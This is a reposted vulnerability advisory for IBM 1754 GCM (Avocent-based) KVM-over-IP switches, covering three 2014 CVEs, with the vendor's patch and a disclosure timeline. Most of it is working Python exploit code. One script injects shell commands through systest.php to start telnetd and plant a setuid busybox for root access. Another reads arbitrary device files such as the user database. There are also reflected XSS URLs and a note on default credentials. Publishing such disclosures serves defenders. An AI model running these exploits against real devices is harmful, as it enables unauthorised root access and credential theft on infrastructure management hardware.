首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IBM 1754 GCM KVM Multiple Vulnerabilities
来源:alex.a.bravo@gmail.com 作者:Alvarez 发布时间:2014-09-01  
*Product description*
The IBM 1754 GCM family provides KVM over IP and serial console management
technology in a single appliance. Versions v1.20.0.22575 and prior are
vulnerables.
Note that this vulnerability is also present in some DELL and probably
other vendors of this rebranded KVM. I contacted Dell but no response has
been received.
  
*1. Remote code execution *
CVEID: CVE-2014-2085
Description: Improperly sanitized input may allow a remote authenticated
attacker to perform remote code execution on the GCM KVM switch.
PoC of this vulnerability:
  
#!/usr/bin/python"""
Exploit for Avocent KVM switch v1.20.0.22575.
Remote code execution with privilege elevation.
SessionId (avctSessionId) is neccesary for this to work, so you need a
valid user. Default user is "Admin" with blank password.
After running exploit, connect using telnet to device with user target
(pass: target) then do "/tmp/su -" to gain root (password "root")
alex.a.bravo@gmail.com
"""
  
from StringIO import StringIO
import pycurl
import os
  
sessid = "1111111111"
target = "192.168.0.10"
  
durl = "https://" + target + "/systest.php?lpres=;%20/usr/
sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%
206755%20/tmp/su%20;"
  
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.COOKIE,'avctSessionId=' + sessid)
  
try:
print "[*] Sending GET to " + target + " with session id " + sessid
+ "..."
c.perform()
c.close()
except:
print ""
finally:
print "[*] Done"
print "[*] Trying telnet..."
print "[*] Login as target/target, then do /tmp/su - and enter password
\"root\""
os.system("telnet " + target)
  
*2. Arbitrary file read *
CVEID: CVE-2014-3081
Description: This device allows any authenticated user to read arbitrary
files. Files can be anywhere on the target.
  
PoC of this vulnerability:
  
#!/usr/bin/python
"""
This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to
read arbitrary files on device.
SessionId (avctSessionId) is neccesary for this to work, so you need a
valid user.
alex.a.bravo@gmail.com
"""
  
from StringIO import StringIO
import pycurl
  
sessid = "1111111111"
target = "192.168.0.10"
file = "/etc/IBM_user.dat"
  
durl = "https://" + target + "/prodtest.php?engage=video_
bits&display=results&filename=" + file
  
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.COOKIE,'avctSessionId=' + sessid)
  
try:
c.perform()
c.close()
except:
print ""
  
content = storage.getvalue()
print content.replace("<td>","").replace("</td>","")
  
*3. Cross site scripting non-persistent*
CVEID: CVE-2014-3080
Description: System is vulnerable to cross-site scripting, caused by
improper validation of user-supplied input. A remote attacker could exploit
this vulnerability using a specially-crafted URL to execute script in a
victim's Web browser within the security context of the hosting Web site,
once the URL is clicked. An attacker could use this vulnerability to steal
the victim's cookie-based authentication credentials.
  
Examples:
http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E
https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E
  
*Vendor Response:*
IBM release 1.20.20.23447 firmware
  
*Timeline:*
2014-05-20 - Vendor (PSIRT) notified
2014-05-21 - Vendor assigns internal ID
2014-07-16 - Patch Disclosed
2014-07-17 - Vulnerability disclosed
  
*External Information:*
Info about the vulnerability (spanish):
http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html
IBM Security Bulletin:
http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HTML Help Workshop 1.4 - (SEH)
·Baidu Spark Browser v26.5.9999
·NRPE 2.15 Remote Command Execu
·Wing FTP Server Authenticated
·XRMS - Blind SQL Injection and
·Android Browser Same Origin Po
·PhpWiki - Remote Command Execu
·Google Chrome 31.0 XSS Auditor
·ActualAnalyzer Lite 2.81 - Una
·LeapFTP 3.1.0 URL Handling Buf
·Plogger 1.0-RC1 - Authenticate
·Apple iOS 7.1.2 Merge Apps Ser
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved